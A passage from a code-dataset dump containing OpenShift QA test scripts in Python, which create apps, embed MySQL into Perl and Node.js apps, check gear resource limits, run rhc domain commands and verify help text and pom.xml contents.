\"DBI:mysql:$dbname:$location:$port\";\nmy $db_user = $ENV{\"OPENSHIFT_MYSQL_DB_USERNAME\"};\nmy $db_pass = $ENV{\"OPENSHIFT_MYSQL_DB_PASSWORD\"};\nmy $dbh = DBI->connect($database, $db_user, $db_pass) or die \"Cannot connect database\";\nmy $sth = $dbh->prepare(\"DROP TABLE IF EXISTS ucctalk\") or die $dbh->errstr;\n$sth->execute() or die \"Cannot execute SQL command:$dbh->errstr\";\nmy $sth = $dbh->prepare(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\") or die $dbh->errstr;\n$sth->execute() or die \"Cannot execute SQL command:$dbh->errstr\";\nmy $sth = $dbh->prepare(\"INSERT INTO ucctalk (speaker,title) VALUES ('Jeremy Zawodny', 'Optimizing MySQL'), ('Sanja Byelkin', 'Sub-Queries in MySQL'), ('Tim Bunce', 'Advanced Perl DBI')\") or die $dbh->errstr;\n$sth->execute() or die \"Cannot execute SQL command:$dbh->errstr\";\nmy $sth = $dbh->prepare(\"SELECT * FROM ucctalk\") or die $dbh->errstr;\n$sth->execute() or die \"Cannot execute SQL command:$dbh->errstr\";\nwhile (@ary = $sth->fetchrow_array())\n{\n print join(\", \",@ary),\"\\n\";\n}\n$sth->finish();\n$dbh->disconnect;\"\"\"\n new_filename = \"mysql.pl\"\n f = open(\"%s/perl/%s\"%(self.app_name, new_filename), \"w\")\n f.write(new_page)\n f.close()\n cmd = \"cd %s; git add perl/%s && git commit -a -m 'changes' && git push\"%(self.app_name, new_filename)\n (status, output) = common.command_getstatusoutput(cmd)\n return status\n\n self.steps_list.append(testcase.TestCaseStep(\"Create a page which does some operation with mysql database like mysql.pl:\",\n add_page,\n function_parameters=[self.app_name],\n expect_description=\"The page should be added without errros\",\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Verify the MySQL functionality...\",\n self.verify,\n expect_description=\"The page should be added without errros\",\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Remove embedded mysql from the app\", \n common.embed,\n function_parameters=[self.app_name, \"remove-\" + common.cartridge_types['mysql']],\n expect_description=\"the mysql should be removed successfully\",\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EmbedMysqlToPerl)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7152777910232544, "alphanum_fraction": 0.7152777910232544, "avg_line_length": 16.625, "blob_id": "ba9c87fa01a915f1a1926b0b296c1fc50d2f9084", "content_id": "18349b0aadfc2c8f27582e0d2aa03b804dd52a48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 144, "license_type": "no_license", "max_line_length": 21, "num_lines": 8, "path": "/automation/open/lib/common/__init__.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nfrom consts import *\nfrom misc import *\nfrom client import *\nfrom rest import *\nfrom admin import *\nfrom web import *\n\n\n\n" }, { "alpha_fraction": 0.5639856457710266, "alphanum_fraction": 
0.5805693864822388, "avg_line_length": 32.49536895751953, "blob_id": "90cc9bf6bb2d69bda1bf8796c42b448960dd26c3", "content_id": "cce247eb1781b3bc00c422226cee0dd23bebf5b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7236, "license_type": "no_license", "max_line_length": 164, "num_lines": 216, "path": "/automation/open/testmodules/RT/cartridge/embed_mysql_to_nodejs.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n#\n# File name: nodejs_mysql.py\n# Date: 2012/03/02 11:59\n# Author: [email protected]\n#\n\nimport sys\nimport subprocess\nimport os\nimport string\nimport re\n\nimport testcase, common, OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US590][runtime][rhc-cartridge]Embed MySQL instance to nodejs application\"\n self.app_name = 'nodejs1'\n self.app_type = 'nodejs'\n self.tcms_testcase_id = 137748\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass NodejsMysqlSupport(OpenShiftTest):\n def test_method(self):\n\n self.steps_list.append(testcase.TestCaseStep(\"Create a Node.js\",\n common.create_app,\n function_parameters=[self.app_name, common.app_types[self.app_type], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Embed with MySQL\" ,\n common.embed,\n function_parameters = [self.app_name, 'add-%s'%common.cartridge_types['mysql'],self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_return=0))\n\n def upload_server(app_name):\n mysql = OSConf.get_apps()[app_name]['embed'][common.cartridge_types['mysql']]\n try:\n f = open('%s/server.js'%app_name,'w')\n f.write('''#!/bin/env node\n// OpenShift sample Node application\n\nvar express = require('express');\nvar fs = require('fs');\nvar mysql = require('mysql');\nvar client = mysql.createClient({\n user:'%s',\n password :'%s'\n});\nclient.host ='%s';\nclient.port = %s;\nclient.database = '%s';\n\n// Local cache for static content [fixed and loaded at startup]\nvar zcache = { 'index.html': '' };\nzcache['index.html'] = fs.readFileSync('./index.html'); // Cache index.html\n\n// Create \"express\" server.\nvar app = express.createServer();\n\n\n/* ===================================================================== */\n/* Setup route handlers. 
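Each app.get(path, handler) call below binds handler to GET requests for that path. 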
*/\n/* ===================================================================== */\n\n// Handler for GET /health\napp.get('/health', function(req, res){\n res.send('1');\n});\n\n// Handler for GET /asciimo\napp.get('/asciimo', function(req, res){\n var link=\"https://a248.e.akamai.net/assets.github.com/img/d84f00f173afcf3bc81b4fad855e39838b23d8ff/687474703a2f2f696d6775722e636f6d2f6b6d626a422e706e67\";\n res.send(\"<html><body><img src='\" + link + \"'></body></html>\");\n});\n\n// Handler for GET /\napp.get('/', function(req, res){\n res.send(zcache['index.html'], {'Content-Type': 'text/html'});\n});\n// Handler for GET /data1.js\napp.get('/data1.js', function(req, res){\n client.query(\"DROP TABLE IF EXISTS info\");\n client.query(\"CREATE TABLE info(id INT PRIMARY KEY, data VARCHAR(20))\");\n client.query(\"INSERT INTO info VALUES(1, '#OPENSHIFT_1#')\");\n //client.end();\n res.send('Please visit /show.js to see the data', {'Content-Type': 'text/plain'});\n});\n// Handler for GET /data2.js\napp.get('/data2.js', function(req, res){\n client.query(\"DROP TABLE IF EXISTS info\");\n client.query(\"CREATE TABLE info(id INT PRIMARY KEY, data VARCHAR(20))\");\n client.query(\"INSERT INTO info VALUES(1, '#OPENSHIFT_2#')\");\n //client.end();\n res.send('Please visit /show.js to see the data', {'Content-Type': 'text/plain'});\n});\n// Handler for GET /show.js\napp.get('/show.js', function(req, res){\n client.query(\n 'SELECT data FROM info',\n function selectCb(err, results, fields) {\n if (err) {\n res.send('Failed to get data from database', {'Content-Type': 'text/plain'});\n throw err;\n }\n else {\n res.send(results[0]['data'], {'Content-Type': 'text/plain'});\n }\n }\n );\n //client.end();\n});\n\n\n// Get the environment variables we need.\nvar ipaddr = process.env.OPENSHIFT_INTERNAL_IP;\nvar port = process.env.OPENSHIFT_INTERNAL_PORT || 8080;\n\nif (typeof ipaddr === \"undefined\") {\n console.warn('No OPENSHIFT_INTERNAL_IP environment variable');\n}\n\n// terminator === the termination handler.\nfunction terminator(sig) {\n if (typeof sig === \"string\") {\n console.log('%%s: Received %%s - terminating Node server ...',\n Date(Date.now()), sig);\n process.exit(1);\n }\n console.log('%%s: Node server stopped.', Date(Date.now()) );\n}\n\n// Process on exit and signals.\nprocess.on('exit', function() { terminator(); });\n\n['SIGHUP', 'SIGINT', 'SIGQUIT', 'SIGILL', 'SIGTRAP', 'SIGABRT', 'SIGBUS',\n 'SIGFPE', 'SIGUSR1', 'SIGSEGV', 'SIGUSR2', 'SIGPIPE', 'SIGTERM'\n].forEach(function(element, index, array) {\n process.on(element, function() { terminator(element); });\n});\n\n// And start the app on that interface (and port).\napp.listen(port, ipaddr, function() {\n console.log('%%s: Node server started on %%s:%%d ...', Date(Date.now() ), ipaddr, port);\n});'''%(mysql['username'], mysql['password'], mysql['url'], mysql['port'], mysql['database']))\n\n f.close()\n command = '''cd %s && \n chmod +x server.js &&\n git add server.js &&\n git commit -m \"Added server.js\" -a &&\n git push'''%app_name\n\n (status, output) = common.command_getstatusoutput(command)\n\n except Exception as e:\n self.info(\"ERROR: %s\"%str(e))\n return 255\n\n return status\n\n self.steps_list.append(testcase.TestCaseStep(\"Add server.js file\" ,\n upload_server,\n function_parameters = [self.app_name],\n expect_return=0))\n\n def verify(app_name):\n url = OSConf.get_app_url(app_name)\n r = common.grep_web_page(\"%s/data1.js\"%url, 'Please visit /show.js to see the data')\n r += common.grep_web_page(\"%s/show.js\"%url, 
'OPENSHIFT_1')\n r += common.grep_web_page(\"%s/data2.js\"%url, 'Please visit /show.js to see the data')\n r += common.grep_web_page(\"%s/show.js\"%url, 'OPENSHIFT_2')\n return r\n\n self.steps_list.append(testcase.TestCaseStep(\"Verify it the web output\" ,\n verify,\n function_parameters = [self.app_name],\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NodejsMysqlSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of nodejs_mysql.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5439282655715942, "alphanum_fraction": 0.5747470259666443, "avg_line_length": 33.7760009765625, "blob_id": "4ac8b9c44cad70e31dad43a1b7eeba61171c0b2e", "content_id": "466bfa26e08446e59d4658006956f3acc8b845c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4348, "license_type": "no_license", "max_line_length": 169, "num_lines": 125, "path": "/automation/open/testmodules/RT/node/change_std_gear.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: change_std_gear.py\n# Date: 2012/02/24 07:55\n# Author: [email protected]\n#\n\nimport sys\nimport os\nimport re\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[rhc-node] [US1823] Change STD 'gear' to new standard\"\n self.app_name = common.getRandomString(10)\n self.res_limit_file = '/etc/openshift/resource_limits.conf.large'\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'jbossas'\n tcms_testcase_id = 135819\n self.steps = []\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass ChangeStdGear(OpenShiftTest):\n def test_method(self):\n\n '''self.steps.append(testcase.TestCaseStep(\"Verify the symlink to STD\",\n 'ls -l /etc/openshift/resource_limits.conf|grep std && echo PASS',\n expect_string_list = ['PASS'],\n expect_return = 0))\n '''\n\n self.steps.append(testcase.TestCaseStep(\"Create a app\",\n common.create_app,\n function_parameters=[self.app_name, \n common.app_types[self.app_type], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, False],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"Check the memory limits\",\n self.cgsnapshot,\n expect_description = \"Verify memory.limit_in_bytes=536870912 (512 MByte) & memory.memsw.limit_in_bytes = 641728512 (512 MByte + 100 MByte)\", \n expect_return=0))\n\n # Run the following command and in the output see the section 'group libra/<UUID>'\n\n self.steps.append(testcase.TestCaseStep(\"Create a app\",\n self.repquota,\n expect_description = \"Hard block limit for given user should be 1048576 (1GB)\",\n expect_return=0))\n \n\n # Verify the file /etc/openshift/resource_limits.conf.large \n\n self.steps.append(testcase.TestCaseStep(\"Verify limits in %s\"%self.res_limit_file,\n self.verify_limits,\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps)\n 
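# Execute the queued steps; a failing step raises testcase.TestCaseStepFail (handled below).\n        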
try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def cgsnapshot(self):\n uuid = OSConf.get_app_uuid(self.app_name)\n cmd=\"cgsnapshot -s | awk '/group libra\\/%s/{yes=1} /^}/{if(yes==1) yes=0} {if(yes==1) print $0}'\"%uuid\n (status, output) = common.run_remote_cmd_as_root(cmd)\n if status == 0:\n obj = re.search(r\"memory.limit_in_bytes=\\\"536870912\", output, re.MULTILINE)\n obj2 = re.search(r\"memory.memsw.limit_in_bytes=\\\"641728512\", output, re.MULTILINE)\n if obj and obj2:\n return 0\n else:\n print \"ERROR: Unable to verify memory limits.\"\n return 1\n return 1\n\n def repquota(self):\n cmd = \"repquota /var/ | awk '/^%s/{ print $5 }' \"%OSConf.get_app_uuid(self.app_name)\n (status, output) = common.run_remote_cmd_as_root(cmd)\n obj = re.search(r\"1048576\", output)\n if obj:\n return 0\n return 1\n\n def verify_limits(self):\n cmd = \"grep -c -e 'quota_blocks=1048576' -e 'memory_limit_in_bytes=1073741824' -e 'memory_memsw_limit_in_bytes=1178599424' '%s' && echo PASS\"%self.res_limit_file\n\n (status, output) = common.run_remote_cmd_as_root(cmd)\n obj = re.search(r\"PASS\", output)\n if (obj):\n return 0\n return 1\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ChangeStdGear)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of change_std_gear.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5715978741645813, "alphanum_fraction": 0.5757455825805664, "avg_line_length": 32.09150314331055, "blob_id": "9eb528f989d24fb603fd6836769d8739649916b0", "content_id": "74f0fbb8e57cc092c5557817b7403de23632dd6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5063, "license_type": "no_license", "max_line_length": 114, "num_lines": 153, "path": "/automation/open/testmodules/RT/quick_start/quick_start_test.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\[email protected]\nMay 29, 2012\n\"\"\"\n\nimport rhtest\nimport common\nimport re\nimport json\nfrom pycurl import Curl\nfrom pycurl import URL\nfrom pycurl import WRITEFUNCTION\nfrom shutil import rmtree\nfrom time import sleep\nfrom StringIO import StringIO\n\nclass QuickStartTest(rhtest.Test):\n \"\"\"\n This is the super-class for OpenShift quick-start testing.\n \n If you need something specific in your sub-class, then you have to override the\n appropriate method.\n \"\"\"\n\n def get_github_repo_name(self):\n \"\"\"Returns reponame on GitHub\"\"\"\n return re.split(r'[/]', re.sub(r'\\.git$', '', self.config.git_upstream_url))[-1]\n\n def get_git_branch_name(self):\n \"\"\"Return the branch name should be used. 
If a 'dev/typeless' branch were available it would be preferred; the\n        current behaviour is to always use 'master'.\"\"\"\n        # The old GitHub lookup, disabled but kept for reference:\n        # self.info(\"Repo name: \" + self.get_github_repo_name())\n        # github_response = StringIO()\n        # github = Curl()\n        # github.setopt(URL, \"https://api.github.com/repos/openshift/%s/branches\" % self.get_github_repo_name())\n        # github.setopt(WRITEFUNCTION, github_response.write)\n        # github.perform()\n        # branches = json.loads(github_response.getvalue())\n        # Looking for branch 'dev/typeless'\n        # branch_name_return = \"master\"\n        # for branch in branches:\n        #     if branch[\"name\"] == \"dev/typeless\":\n        #         branch_name_return = branch[\"name\"]\n        #         break\n        # self.info(\"We will use branch '%s'\" % branch_name_return)\n        # return branch_name_return\n        # The new behaviour is to use the master branch.\n        return \"master\"\n\n    def log_info(self, message):\n        self.info(\"===========================\")\n        self.info(message)\n        self.info(\"===========================\")\n    \n    def initialize(self):\n        self.log_info(\"Initializing\")\n        self.config.application_name = common.getRandomString()\n        # General set-up\n        common.env_setup()\n        # Creating the application\n        common.create_app(\n            self.config.application_name,\n            self.config.application_type,\n            self.config.OPENSHIFT_user_email,\n            self.config.OPENSHIFT_user_passwd,\n            clone_repo = True,\n            git_repo = \"./\" + self.config.application_name\n        )\n        \n        # Embedding cartridges\n        for cartridge in self.config.application_embedded_cartridges:\n            common.embed(\n                self.config.application_name,\n                \"add-\" + cartridge,\n                self.config.OPENSHIFT_user_email,\n                self.config.OPENSHIFT_user_passwd\n            )\n        \n    def finalize(self):\n        self.log_info(\"Finalizing\")\n        rmtree(\"./%s\" % self.config.application_name)\n    \n    def pre_configuration_steps(self):\n        pass\n    \n    def configuration_steps(self):\n        self.log_info(\"Configuring\")\n        branch_name = self.get_git_branch_name()\n        # Adding upstream url\n        steps = [\n            \"cd %s\" % self.config.application_name,\n            \"git remote add upstream -m %s %s\" % ( branch_name, self.config.git_upstream_url ),\n            \"git pull --no-edit -s recursive -X theirs upstream %s\" % branch_name\n        ]\n        ret_code = common.command_get_status(\" && \".join(steps))\n        self.assert_equal(ret_code, 0, \"Upstream git repo must be pulled successfully\")\n    \n    def post_configuration_steps(self):\n        pass\n    \n    def pre_deployment_steps(self):\n        pass\n    \n    def deployment_steps(self):\n        self.log_info(\"Deploying\")\n        steps = [\n            \"cd %s\" % self.config.application_name,\n            \"git push\"\n        ]\n        if self.get_run_mode() == \"OnPremise\":\n            ( ret_code, ret_output ) = common.command_getstatusoutput(\" && \".join(steps), False, 1200)\n        else:\n            ( ret_code, ret_output ) = common.command_getstatusoutput(\" && \".join(steps))\n        self.assert_equal(ret_code, 0, \"Git push operation must be successful\")\n        return ( ret_code, ret_output )\n    \n    def post_deployment_steps(self):\n        pass\n    \n    def verification(self):\n        self.log_info(\"Verifying\")\n        sleep(30) # Waiting 30 seconds before checking\n        ret_code = common.check_web_page_output(\n            self.config.application_name,\n            self.config.page,\n            self.config.page_pattern \n        )\n        self.assert_equal(ret_code, 0, \"Pattern %s must be found\" % self.config.page_pattern)\n    \n    def test_method(self):\n        #\n        # Step 1. Configuration\n        #\n        self.pre_configuration_steps()\n        self.configuration_steps()\n        self.post_configuration_steps()\n        #\n        # Step 2. Deployment\n        #\n        self.pre_deployment_steps()\n        self.deployment_steps()\n        self.post_deployment_steps()\n        #\n        # Step 3. 
Verification\n #\n self.verification()\n #\n # Everything is fine: PASSED\n #\n return self.passed(self.config.summary)\n" }, { "alpha_fraction": 0.5399761199951172, "alphanum_fraction": 0.5432577729225159, "avg_line_length": 37.09090805053711, "blob_id": "44abee736ccfd62d472bc40b13f23a5fe78e6702", "content_id": "8e553b331e69d12b548d38cebc1f2d9543ecbc99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3352, "license_type": "no_license", "max_line_length": 168, "num_lines": 88, "path": "/automation/open/testmodules/RT/client/rhc_domain.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport common\nimport rhtest\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"[US1317][UI][CLI]rhc wrapper - rhc domain\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.domain_name = common.get_domain_name()\n\n common.env_setup()\n\n\n def finalize(self):\n #if we are interrupted in the middle of destroying domain...\n common.fix_domain(common.getRandomString(10), self.user_email, self.user_passwd)\n\n\nclass RhcDomain(OpenShiftTest):\n def test_method(self):\n self.add_step(\n \"Help\",\n \"rhc help domain\",\n expect_description = \"Command line should provide the appropriate help message\",\n expect_str = [\n \"Usage: rhc domain\",\n \"List of Actions\", \"\\s+create\", \"\\s+show\", \"\\s+update\", \"\\s+status\", \"\\s+delete\",\n \"Global Options\", \" -l|--rhlogin\", \"-p|--password\", \"-d|--debug\", \"-h|--help\",\n \" --config\" ])\n\n # Covering the full domain namespace life cycle\n for action in [ \"show\", \"update\", \"delete\", \"create\" ]:\n extra_parameters = \"\"\n dependency = \"\"\n # Configuring command line parameters for each action\n if action == \"delete\":\n extra_parameters = \"-n new\" + self.domain_name\n if action == \"update\":\n extra_parameters = \"%s new%s\" % (self.domain_name, self.domain_name)\n\n if action == \"create\":\n extra_parameters = \"-n \" + self.domain_name\n if action == \"status\":\n dependency = \"eval $(ssh-agent) ; ssh-add ~/.ssh/id_rsa && \"\n # Actions are tested with failure and success\n for result in [ \"success\", \"failure\"]:\n if result == \"success\":\n # Return code must be 0 on success\n return_value_expected = 0\n elif result == \"failure\":\n if action == \"show\" or action == \"status\":\n # Skipping failure testing for actions 'show' and 'status'\n continue\n if action == \"create\" or action == \"alter\":\n extra_parameters = extra_parameters + common.getRandomString(20)\n if action == \"show\":\n extra_parameters = extra_parameters + \"-n \" + self.domain_name\n return_value_expected = \"!0\"\n self.add_step(\n \"Action '%s' - %s\" % ( action, result.upper() ),\n \"%s rhc domain %s -l %s -p %s %s %s\" % ( dependency, action, self.user_email, self.user_passwd, extra_parameters, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = \"The action is performed with %s\" % ( result ),\n expect_return = return_value_expected)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcDomain)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.75, 
"alphanum_fraction": 0.75, "avg_line_length": 20.66666603088379, "blob_id": "1f4e280380c9b5e25cf66e63f0c376b6ff685d44", "content_id": "c5c161223b9ea60c2d19a4f41726b9c672ccb5da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 64, "license_type": "no_license", "max_line_length": 51, "num_lines": 3, "path": "/automation/parallel/run_tests.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\npybot --outputdir results --exclude parallel atest/" }, { "alpha_fraction": 0.6107184886932373, "alphanum_fraction": 0.6166077852249146, "avg_line_length": 28.789474487304688, "blob_id": "fc1a333fde86f99dde808bee8cb1c5bd58da5794", "content_id": "546e17fa93f9542bda70ce74cac5ee7e105eead6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1698, "license_type": "no_license", "max_line_length": 143, "num_lines": 57, "path": "/automation/open/testmodules/RT/client/rhc_help_gear_size.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import common\nimport rhtest\nimport sys\nimport re\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n #self.info(\"[US2001][Runtime][rhc-node] check help page and man page for the gear sizes\")\n self.testcase_summary = \"[US2001][Runtime][rhc-node] check help page and man page for the gear sizes\"\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass RhcHelpGearSize(OpenShiftTest):\n def log_message(self, pattern, status):\n self.info(\"Pattern '%s'... %s\" % ( pattern, status ))\n \n def test_method(self):\n \n self.command = \"rhc app create\"\n self.pattern_list = ['-g', '--gear-size', \"Geari\\s+size\\s+controls\\s+how\\s+much\\s+memory\\s+and\\s+CPU\\s+your\\s+cartridges\\s+can\\s+use.\"]\n \n ( ret_code, output ) = common.command_getstatusoutput('rhc help app create')\n \n # Checking patterns in the output\n missing_patterns = [ ]\n for pattern in self.pattern_list:\n result = \"OK\"\n match = re.search(pattern, output)\n if not match:\n result = \"FAIL\"\n missing_patterns.append(pattern)\n self.log_message(pattern, result)\n\n # Assertion\n self.info('Asserting that the number of missing patterns is 0')\n self.assert_equal(len(missing_patterns), 0)\n\n # Everythng is OK\n return self.passed(\" - \".join([ self.testcase_summary, self.command ]))\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcHelpGearSize)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5889658331871033, "alphanum_fraction": 0.5992357134819031, "avg_line_length": 37.75925827026367, "blob_id": "559838ac00e0519df3af4bc76fc3822cd6febbca", "content_id": "6171dc101dfad8f54037dc8ffc95d497303ca4f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4187, "license_type": "no_license", "max_line_length": 136, "num_lines": 108, "path": "/automation/open/testmodules/RT/cartridge/jboss_improved_pom_xml.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US617] jboss cart pom.xml improvement\nhttps://tcms.engineering.redhat.com/case/122455/\n\"\"\"\nimport os,sys\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US617] 
jboss cart pom.xml improvement\"\n self.app_name = \"jbosspom\"\n self.app_type = common.app_types[\"jbossas\"]\n self.git_repo = \"./%s\" % (self.app_name)\n\n common.env_setup()\n \n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass JbossImprovedPomXml(OpenShiftTest):\n def test_method(self):\n # 1.Create an app\n self.steps_list.append(testcase.TestCaseStep(\n \"1. Create an jbossas app: %s\" % (self.app_name),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 2.Check pom.xml file - groupId\n cmd = \"cd %s && cat pom.xml|grep groupId|grep %s\" % (self.git_repo, self.app_name)\n self.steps_list.append( testcase.TestCaseStep(\"2.Check pom.xml file - groupId\",\n cmd,\n expect_description=\"'%s' should be found in the groupId of pom.xml\" % (self.app_name),\n expect_return=0))\n\n # 3.Check pom.xml file - artifactId\n cmd = \"cd %s && cat pom.xml|grep artifactId|grep %s\" % (self.git_repo, self.app_name)\n self.steps_list.append( testcase.TestCaseStep(\"3.Check pom.xml file - artifactId\",\n cmd,\n expect_description=\"'%s' should be found in the artifactId of pom.xml\" % (self.app_name),\n expect_return=0))\n\n # 4.Check pom.xml file - name\n cmd = \"cd %s && cat pom.xml|grep name|grep %s\" % (self.git_repo, self.app_name)\n self.steps_list.append( testcase.TestCaseStep(\"4.Check pom.xml file - name\",\n cmd,\n expect_description=\"'%s' should be found in the name of pom.xml\" % (self.app_name),\n expect_return=0))\n\n # 5.Check pom.xml file - warName\n cmd = \"cd %s && cat pom.xml|grep warName|grep ROOT\" % (self.git_repo)\n self.steps_list.append( testcase.TestCaseStep(\"5.Check pom.xml file - warName\",\n cmd,\n expect_description=\"'ROOT' should be found in the warName of pom.xml\",\n expect_return=0))\n\n # 6.Check pom.xml file - outputdirectory\n cmd = \"cd %s && cat pom.xml|grep outputDirectory|grep deployments\" % (self.git_repo)\n self.steps_list.append( testcase.TestCaseStep(\n \"6.Check pom.xml file - outputdirectory\",\n cmd,\n expect_description=\"'deployments' should be found in the outputDirectory of pom.xml\",\n expect_return=0))\n\n # 7.Check pom.xml file - project.build.sourceEncoding\n cmd = \"cd %s && cat pom.xml|grep project.build.sourceEncoding|grep UTF-8\" % (self.git_repo)\n self.steps_list.append( testcase.TestCaseStep(\n \"7.Check pom.xml file - project.build.sourceEncoding\",\n cmd,\n expect_description=\"'UTF-8' should be found in the project.build.sourceEncoding of pom.xml\",\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JbossImprovedPomXml)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6324427723884583, "alphanum_fraction": 0.6454198360443115, "avg_line_length": 41.25806427001953, "blob_id": "f21a96733b1b7130ad3a541305841c56d8424600", "content_id": 
